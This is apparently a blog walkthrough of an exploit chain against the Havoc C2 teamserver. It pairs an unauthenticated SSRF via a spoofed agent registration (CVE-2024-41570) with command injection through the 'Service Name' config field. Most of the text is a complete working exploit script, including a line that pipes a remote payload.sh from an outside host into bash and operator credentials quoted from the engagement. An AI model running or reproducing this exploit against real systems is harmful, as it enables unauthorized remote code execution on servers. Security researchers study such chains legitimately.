This post is for educational purposes only. The author does not condone or support any illegal activities. The author is not responsible for any misuse of the information provided.
During a recent engagement, I encountered an exploit chain targeting the Havoc C2 framework. It starts with an unauthenticated SSRF (CVE-2024-41570) against the Havoc teamserver, triggered by registering a spoofed Demon agent. The SSRF is then combined with a Remote Code Execution (RCE) exploit that makes the server fetch a payload and hand back a reverse shell.
First, let’s look at the imports and core functions:
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto.Cipher import AES
from Crypto.Util import Counter
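These imports tell us the exploit uses cryptography (AES from the Crypto package, e.g. PyCryptodome), makes HTTP requests, and handles binary data. The full script also calls urllib3.disable_warnings(), because every request is sent with verify=False, most likely to cope with self-signed certificates on the listener.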
The encryption implementation is interesting:
# key_bytes = 32 is defined at module level in the full script
def decrypt(key, iv, ciphertext):
    # Pad short keys up to key_bytes with the ASCII character "0"
    if len(key) <= key_bytes:
        for _ in range(len(key), key_bytes):
            key += b"0"
    assert len(key) == key_bytes
    # The IV becomes the initial value of the 128-bit counter
    iv_int = int(binascii.hexlify(iv), 16)
    ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
    aes = AES.new(key, AES.MODE_CTR, counter=ctr)
    plaintext = aes.decrypt(ciphertext)
    return plaintext
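This implements AES in Counter (CTR) mode, with the IV used as the initial counter value. The function itself accepts any key and IV; the script later sets both to null bytes (AES_Key = b"\x00" * 32 and AES_IV = b"\x00" * 16). That works because the registration packet carries the key and IV itself (they follow the request ID in register_agent in the full script), so the teamserver adopts whatever values the spoofed agent announces. Note that the padding branch appends the ASCII character "0" rather than a null byte, but it is never reached with a 32-byte key.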
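To make the key padding and counter setup concrete, here is a minimal standard-library sketch of the two helper steps inside decrypt. The names pad_key and iv_to_int are hypothetical and do not appear in the original script; the AES step itself is left out on purpose.

```python
import binascii

KEY_BYTES = 32  # AES-256 key size, mirroring key_bytes in the full script


def pad_key(key: bytes) -> bytes:
    """Pad a short key the way the script's helpers do (hypothetical helper)."""
    if len(key) < KEY_BYTES:
        # The padding byte is ASCII "0" (0x30), not a null byte (0x00)
        key += b"0" * (KEY_BYTES - len(key))
    return key


def iv_to_int(iv: bytes) -> int:
    """Convert the IV into the integer used as the initial CTR counter value."""
    return int(binascii.hexlify(iv), 16)


if __name__ == "__main__":
    print(pad_key(b"abc"))          # short key, padded with "0" characters
    print(iv_to_int(b"\x00" * 16))  # an all-null IV starts the counter at zero
```

With the all-null key and IV used by the script, pad_key returns the key unchanged and the counter starts at zero.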
The agent registration is particularly clever:
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
    command = b"\x00\x00\x00\x63"     # Command code for registration
    request_id = b"\x00\x00\x00\x01"  # First request
    demon_id = agent_id               # Random agent ID
    # Pack lengths of each field
    hostname_length = int_to_bytes(len(hostname))
    username_length = int_to_bytes(len(username))
    domain_name_length = int_to_bytes(len(domain_name))
    internal_ip_length = int_to_bytes(len(internal_ip))
    process_name_length = int_to_bytes(len(process_name) - 6)
This function creates a fake agent and registers it with the teamserver. It builds the byte layout the listener expects: each field is preceded by its length as a 4-byte big-endian integer. The process name is encoded as UTF-16LE in the full script, and its declared length is 6 bytes shorter than the encoded buffer; the script does not say why.
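The length-prefix convention can be illustrated in isolation. The sketch below is not taken from the exploit; pack_field and unpack_field are hypothetical helpers that use the standard struct module to show the same 4-byte big-endian prefix that int_to_bytes produces.

```python
import struct


def pack_field(data: bytes) -> bytes:
    """Prefix a field with its length as a 4-byte big-endian integer."""
    return struct.pack(">I", len(data)) + data


def unpack_field(buf: bytes, offset: int = 0):
    """Read one length-prefixed field; return (field, offset of next field)."""
    (length,) = struct.unpack_from(">I", buf, offset)
    start = offset + 4
    return buf[start:start + length], start + length


if __name__ == "__main__":
    hostname = b"DESKTOP-7F61JT1"                 # default from the script
    process = "msedge.exe".encode("utf-16le")     # two bytes per character
    blob = pack_field(hostname) + pack_field(process)
    first, nxt = unpack_field(blob)
    second, _ = unpack_field(blob, nxt)
    print(first, len(second))
```

Because UTF-16LE uses two bytes per ASCII character, the default process name occupies 20 bytes on the wire rather than 10.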
The socket manipulation is where things get interesting:
def open_socket(socket_id, target_address, target_port):
    command = b"\x00\x00\x09\xec"     # Socket command
    request_id = b"\x00\x00\x00\x02"
    subcommand = b"\x00\x00\x00\x10"  # Open socket subcommand
    sub_request_id = b"\x00\x00\x00\x03"
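This asks the teamserver to open a TCP socket to an address and port chosen by the attacker, which is the SSRF primitive. The command code 0x9EC (2540 in decimal) and the subcommand 0x10 indicate the author has worked out Havoc's protocol format, most likely from its public source code.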
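For readers who prefer decimal values, the 4-byte codes in the excerpts can be decoded with int.from_bytes. The dictionary labels below are my own shorthand for this post, not names from Havoc; the byte values are copied from the script.

```python
# Byte values copied from the script; the labels are hypothetical shorthand.
CODES = {
    "register": b"\x00\x00\x00\x63",
    "socket": b"\x00\x00\x09\xec",
    "socket_open": b"\x00\x00\x00\x10",
    "socket_write": b"\x00\x00\x00\x11",
}


def decode_code(raw: bytes) -> int:
    """Interpret a 4-byte big-endian command code as an integer."""
    return int.from_bytes(raw, "big")


if __name__ == "__main__":
    for label, raw in CODES.items():
        value = decode_code(raw)
        print(f"{label}: {value} (0x{value:X})")
```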
Now for the actual exploitation:
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
# ... websocket setup ...
cmd = "curl http://10.10.14.224:8080/payload.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""
The attack authenticates over the WebSocket with operator credentials hardcoded in the script (the full listing below uses placeholder values), then performs command injection through the Service Name parameter. The injection string breaks down as follows:
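\\\\\\\" - Escapes through multiple layers of string parsing
-mbla; - Appears to break out of the original command context; the semicolon ends that command so the next one runs on its own
1>&2 - Redirects standard output to stderr
&& false # - Forces a non-zero exit status after the command runs, and the # comments out whatever remains of the original command line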
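The behavior of the last two pieces is ordinary POSIX shell semantics and can be checked with a harmless command. This is a small sketch assuming a POSIX /bin/sh is available; the echo command and the run helper are illustrative and unrelated to Havoc.

```python
import subprocess


def run(command: str):
    """Run a command through the shell and return (stdout, stderr, exit code)."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout, result.stderr, result.returncode


# "1>&2" sends echo's output to stderr, "&& false" makes the overall exit
# status non-zero, and everything after "#" is treated as a comment.
stdout, stderr, code = run("echo hello 1>&2 && false # this text is ignored")

if __name__ == "__main__":
    print(repr(stdout), repr(stderr), code)
```

The output lands on stderr, stdout stays empty, and the exit status is non-zero even though the echo itself succeeded.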
The payload construction shows how the injection is delivered:
payload = { "Body" : { "Info" : { "AgentType" : "Demon" , "Arch" : "x64" , "Config" : "{ \n \" Amsi/Etw Patch \" : \" None \" , \n \" Indirect Syscall \" : false, \n \" Injection \" : { \n \" Alloc \" : \" Native/Syscall \" , \n \" Execute \" : \" Native/Syscall \" , \n \" Spawn32 \" : \" C: \\\\ Windows \\\\ SysWOW64 \\\\ notepad.exe \" , \n \" Spawn64 \" : \" C: \\\\ Windows \\\\ System32 \\\\ notepad.exe \"\n }, \n \" Jitter \" : \" 0 \" , \n \" Proxy Loading \" : \" None (LdrLoadDll) \" , \n \" Service Name \" : \" " + injection + " \" , \n \" Sleep \" : \" 2 \" , \n \" Sleep Jmp Gadget \" : \" None \" , \n \" Sleep Technique \" : \" WaitForSingleObjectEx \" , \n \" Stack Duplication \" : false \n } \n "
This crafts a seemingly legitimate configuration with the injection hidden in the “Service Name” parameter. When the teamserver processes this configuration, the injected command executes.
The full exploit script is here:
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto . Cipher import AES
from Crypto . Util import Counter
urllib3 . disable_warnings ()
key_bytes = 32
def decrypt (key, iv, ciphertext):
if len (key) <= key_bytes:
for _ in range ( len (key), key_bytes):
key += b "0"
assert len (key) == key_bytes
iv_int = int (binascii . hexlify (iv), 16 )
ctr = Counter . new (AES . block_size * 8 , initial_value = iv_int)
aes = AES . new (key, AES . MODE_CTR, counter = ctr)
plaintext = aes . decrypt (ciphertext)
return plaintext
def int_to_bytes (value, length = 4 , byteorder = "big" ):
return value . to_bytes (length, byteorder)
def encrypt (key, iv, plaintext):
if len (key) <= key_bytes:
for x in range ( len (key), key_bytes):
key = key + b "0"
assert len (key) == key_bytes
iv_int = int (binascii . hexlify (iv), 16 )
ctr = Counter . new (AES . block_size * 8 , initial_value = iv_int)
aes = AES . new (key, AES . MODE_CTR, counter = ctr)
ciphertext = aes . encrypt (plaintext)
return ciphertext
def register_agent (hostname, username, domain_name, internal_ip, process_name, process_id):
command = b " \x00\x00\x00\x63 "
request_id = b " \x00\x00\x00\x01 "
demon_id = agent_id
hostname_length = int_to_bytes ( len (hostname))
username_length = int_to_bytes ( len (username))
domain_name_length = int_to_bytes ( len (domain_name))
internal_ip_length = int_to_bytes ( len (internal_ip))
process_name_length = int_to_bytes ( len (process_name) - 6 )
data = b " \xab " * 100
header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
print (agent_header + header_data)
print ( "[***] Trying to register agent..." )
r = requests . post (teamserver_listener_url, data = agent_header + header_data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to register agent - {r . status_code} {r . text} " )
def open_socket (socket_id, target_address, target_port):
command = b " \x00\x00\x09\xec "
request_id = b " \x00\x00\x00\x02 "
subcommand = b " \x00\x00\x00\x10 "
sub_request_id = b " \x00\x00\x00\x03 "
local_addr = b " \x22\x22\x22\x22 "
local_port = b " \x33\x33\x33\x33 "
forward_addr = b ""
for octet in target_address . split ( "." )[:: - 1 ]:
forward_addr += int_to_bytes ( int (octet), length = 1 )
forward_port = int_to_bytes (target_port)
package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
package_size = int_to_bytes ( len (package) + 4 )
header_data = command + request_id + encrypt (AES_Key, AES_IV, package_size + package)
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print ( "[***] Trying to open socket on the teamserver..." )
r = requests . post (teamserver_listener_url, data = data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to open socket on teamserver - {r . status_code} {r . text} " )
def write_socket (socket_id, data):
command = b " \x00\x00\x09\xec "
request_id = b " \x00\x00\x00\x08 "
subcommand = b " \x00\x00\x00\x11 "
sub_request_id = b " \x00\x00\x00\xa1 "
socket_type = b " \x00\x00\x00\x03 "
success = b " \x00\x00\x00\x01 "
data_length = int_to_bytes ( len (data))
package = subcommand + socket_id + socket_type + success + data_length + data
package_size = int_to_bytes ( len (package) + 4 )
header_data = command + request_id + encrypt (AES_Key, AES_IV, package_size + package)
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
post_data = agent_header + header_data
print (post_data)
print ( "[***] Trying to write to the socket" )
r = requests . post (teamserver_listener_url, data = post_data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to write data to the socket - {r . status_code} {r . text} " )
def read_socket (socket_id):
command = b " \x00\x00\x00\x01 "
request_id = b " \x00\x00\x00\x09 "
header_data = command + request_id
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print ( "[***] Trying to poll teamserver for socket output..." )
r = requests . post (teamserver_listener_url, data = data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Read socket output successfully!" )
else :
print ( f "[!!!] Failed to read socket output - {r . status_code} {r . text} " )
return ""
command_id = int . from_bytes (r . content[ 0 : 4 ], "little" )
request_id = int . from_bytes (r . content[ 4 : 8 ], "little" )
package_size = int . from_bytes (r . content[ 8 : 12 ], "little" )
enc_package = r . content[ 12 :]
return decrypt (AES_Key, AES_IV, enc_package)[ 12 :]
def create_websocket_request (host, port):
request = (
f "GET /havoc/ HTTP/1.1 \r\n "
f "Host: {host} : {port} \r\n "
f "Upgrade: websocket \r\n "
f "Connection: Upgrade \r\n "
f "Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg== \r\n "
f "Sec-WebSocket-Version: 13 \r\n "
f " \r\n "
) . encode ()
return request
def build_websocket_frame (payload):
payload_bytes = payload . encode ( "utf-8" )
frame = bytearray ()
frame . append ( 0x 81 )
payload_length = len (payload_bytes)
if payload_length <= 125 :
frame . append ( 0x 80 | payload_length)
elif payload_length <= 65535 :
frame . append ( 0x 80 | 126 )
frame . extend (payload_length . to_bytes ( 2 , byteorder = "big" ))
else :
frame . append ( 0x 80 | 127 )
frame . extend (payload_length . to_bytes ( 8 , byteorder = "big" ))
masking_key = os . urandom ( 4 )
frame . extend (masking_key)
masked_payload = bytearray (byte ^ masking_key[i % 4 ] for i, byte in enumerate (payload_bytes))
frame . extend (masked_payload)
return frame
parser = argparse . ArgumentParser ()
parser . add_argument ( "-t" , "--target" , help = "The listener target in URL format" , required = True )
parser . add_argument ( "-i" , "--ip" , help = "The IP to open the socket with" , required = True )
parser . add_argument ( "-p" , "--port" , help = "The port to open the socket with" , required = True )
parser . add_argument ( "-A" , "--user-agent" , help = "The User-Agent for the spoofed agent" , default = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" )
parser . add_argument ( "-H" , "--hostname" , help = "The hostname for the spoofed agent" , default = "DESKTOP-7F61JT1" )
parser . add_argument ( "-u" , "--username" , help = "The username for the spoofed agent" , default = "Administrator" )
parser . add_argument ( "-d" , "--domain-name" , help = "The domain name for the spoofed agent" , default = "ECORP" )
parser . add_argument ( "-n" , "--process-name" , help = "The process name for the spoofed agent" , default = "msedge.exe" )
parser . add_argument ( "-ip" , "--internal-ip" , help = "The internal ip for the spoofed agent" , default = "10.1.33.7" )
args = parser . parse_args ()
magic = b " \xde\xad\xbe\xef "
teamserver_listener_url = args . target
headers = {
"User-Agent" : args . user_agent
}
agent_id = int_to_bytes (random . randint ( 100000 , 1000000 ))
AES_Key = b " \x00 " * 32
AES_IV = b " \x00 " * 16
hostname = bytes (args . hostname, encoding = "utf-8" )
username = bytes (args . username, encoding = "utf-8" )
domain_name = bytes (args . domain_name, encoding = "utf-8" )
internal_ip = bytes (args . internal_ip, encoding = "utf-8" )
process_name = args . process_name . encode ( "utf-16le" )
process_id = int_to_bytes (random . randint ( 1000 , 5000 ))
register_agent (hostname, username, domain_name, internal_ip, process_name, process_id)
socket_id = b " \x11\x11\x11\x11 "
open_socket (socket_id, args . ip, int (args . port))
USER = "user"
PASSWORD = "password"
host = "127.0.0.1"
port = 40056
websocket_request = create_websocket_request (host, port)
write_socket (socket_id, websocket_request)
response = read_socket (socket_id)
payload = { "Body" : { "Info" : { "Password" : hashlib . sha3_256 (PASSWORD . encode ()) . hexdigest (), "User" : USER}, "SubEvent" : 3 }, "Head" : { "Event" : 1 , "OneTime" : "" , "Time" : "18:40:17" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)
payload = { "Body" :{ "Info" :{ "Headers" : "" , "HostBind" : "0.0.0.0" , "HostHeader" : "" , "HostRotation" : "round-robin" , "Hosts" : "0.0.0.0" , "Name" : "abc" , "PortBind" : "443" , "PortConn" : "443" , "Protocol" : "Https" , "Proxy Enabled" : "false" , "Secure" : "true" , "Status" : "online" , "Uris" : "" , "UserAgent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" }, "SubEvent" : 1 }, "Head" :{ "Event" : 2 , "OneTime" : "" , "Time" : "08:39:18" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)
cmd = "curl http:/<IP>:<PORT>/payload.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""
payload = { "Body" : { "Info" : { "AgentType" : "Demon" , "Arch" : "x64" , "Config" : "{ \n \" Amsi/Etw Patch \" : \" None \" , \n \" Indirect Syscall \" : false, \n \" Injection \" : { \n \" Alloc \" : \" Native/Syscall \" , \n \" Execute \" : \" Native/Syscall \" , \n \" Spawn32 \" : \" C: \\\\ Windows \\\\ SysWOW64 \\\\ notepad.exe \" , \n \" Spawn64 \" : \" C: \\\\ Windows \\\\ System32 \\\\ notepad.exe \"\n }, \n \" Jitter \" : \" 0 \" , \n \" Proxy Loading \" : \" None (LdrLoadDll) \" , \n \" Service Name \" : \" " + injection + " \" , \n \" Sleep \" : \" 2 \" , \n \" Sleep Jmp Gadget \" : \" None \" , \n \" Sleep Technique \" : \" WaitForSingleObjectEx \" , \n \" Stack Duplication \" : false \n } \n " , "Format" : "Windows Service Exe" , "Listener" : "abc" }, "SubEvent" : 2 }, "Head" : {
"Event" : 5 , "OneTime" : "true" , "Time" : "18:39:04" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)
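The build_websocket_frame helper in the listing follows the client-to-server framing from RFC 6455: a FIN/text header byte, a masked length field, a 4-byte masking key, and the XOR-masked payload. As a way to sanity-check that layout, here is a minimal standalone sketch of a frame builder together with a parser that reverses it. Both function names are hypothetical, and the parser only handles single masked text frames.

```python
import os
from typing import Optional


def build_text_frame(payload: str, mask: Optional[bytes] = None) -> bytes:
    """Build one masked WebSocket text frame (client-to-server direction)."""
    data = payload.encode("utf-8")
    if mask is None:
        mask = os.urandom(4)
    frame = bytearray([0x81])  # FIN bit set, opcode 0x1 (text)
    n = len(data)
    if n <= 125:
        frame.append(0x80 | n)            # mask bit plus 7-bit length
    elif n <= 0xFFFF:
        frame.append(0x80 | 126)          # 16-bit extended length follows
        frame += n.to_bytes(2, "big")
    else:
        frame.append(0x80 | 127)          # 64-bit extended length follows
        frame += n.to_bytes(8, "big")
    frame += mask
    frame += bytes(b ^ mask[i % 4] for i, b in enumerate(data))
    return bytes(frame)


def parse_text_frame(frame: bytes) -> str:
    """Recover the payload of a single masked text frame."""
    n = frame[1] & 0x7F
    offset = 2
    if n == 126:
        n = int.from_bytes(frame[2:4], "big")
        offset = 4
    elif n == 127:
        n = int.from_bytes(frame[2:10], "big")
        offset = 10
    mask = frame[offset:offset + 4]
    body = frame[offset + 4:offset + 4 + n]
    return bytes(b ^ mask[i % 4] for i, b in enumerate(body)).decode("utf-8")


if __name__ == "__main__":
    message = '{"ping": 1}'
    print(parse_text_frame(build_text_frame(message)) == message)
```

Passing a fixed mask makes the output deterministic, which is convenient when comparing frames byte for byte.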